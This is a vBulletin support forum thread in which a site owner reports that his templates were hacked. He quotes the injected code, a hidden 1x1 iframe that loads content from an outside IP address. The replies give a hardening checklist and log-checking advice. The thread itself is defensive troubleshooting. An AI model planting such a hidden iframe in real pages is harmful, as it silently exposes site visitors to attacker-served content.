Collapse
X

• Time
  • Show
Clear All
  • Hype
    • Apr 2003

Hacked Template

Over the period of a few days I have had the following show up in my templates

Code:
    <iframe src='http://69.50.190.135/?to=VPS&from=site.com width=1 height=1></iframe>
    I have done many of the things requested to harden the site, any thoughts?
  • Lynne
    Former vBulletin Support
    • Oct 2004

Which of the things in this list have you not done, which have you done, and which aren't you sure if you've done or not? How To Make My Forums More Secure

Please don't PM or VM me for support - I only help out in the threads.
    vBulletin Manual & vBulletin 4.0 Code Documentation (API)
    Want help modifying your vbulletin forum? Head on over to vbulletin.org
    If I post CSS and you don't know where it goes, throw it into the additional.css template.

W3Schools &lt;- awesome site for html/css help

Comment

• Hype
      • Apr 2003

Those in BOLD I have completed

1. Always upgrade to the latest stable version.
      We are one version behind, I just noticed there was an upgrade and I will be performing that soon.

2. Do not install any unofficial hacks or plugins as they are not written or reviewed by our developers.
      3. Password protect your Administrator and Moderator Control Panels directories using .htaccess/.htpassword http://www.javascriptkit.com/howto/htaccess3.shtml
      4. Make sure the tools.php (vB3) file is NOWHERE on your website.
      [strike_temp]5. Although this is only a potential problem if someone gets a hold of your customer number, you should remove the upgrade* files from the install directory (or just the whole install/ directory).[/strike_temp]

6. Remove the ImpEx files if you had used this import system.
      7. If you have phpMyAdmin make sure it's password protected.
      8. If you suspect a hacking attempt, ask your host to change the login password for your web account.
      9. Make sure all the Admin and Mod passwords are secure. Change them if you have any doubts. And use hard to guess passwords.
      10. NEVER allow HTML in posts, PMs or in sigs.
      11. Make absolutely sure there are no viruses, trojans or keylogger spyware on your PC. Any of these could steal your password and other personal info.
      12. Do NOT upload the directory called do_not_upload/
      13. Use a different password for each forum you sign up with. Use a different password for your forum as you do for the .htaccess directory password.
      14. Update the config.php file and set yourself as undeletable user so they can't touch your admin account.

Comment

• Lynne
        Former vBulletin Support
        • Oct 2004

I don't think being one version 'behind' is your problem.

Which modifications have you installed? Have you made sure they are all up-to-date (sometimes security issues are found an new versions are released)?

If I post CSS and you don't know where it goes, throw it into the additional.css template.

Comment

• Hype
          • Apr 2003

Originally posted by U2Lynne
          I don't think being one version 'behind' is your problem.

Which modifications have you installed? Have you made sure they are all up-to-date (sometimes security issues are found an new versions are released)?
          No mods...standard install

Comment

• Lynne
            Former vBulletin Support
            • Oct 2004

When you looked at the template that got modified, who did it say last edited it? Have you looked through your control panel logs to see if anyone was editing templates? How about your access_logs to see who has been accessing your admin cp?

Comment

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
            Working...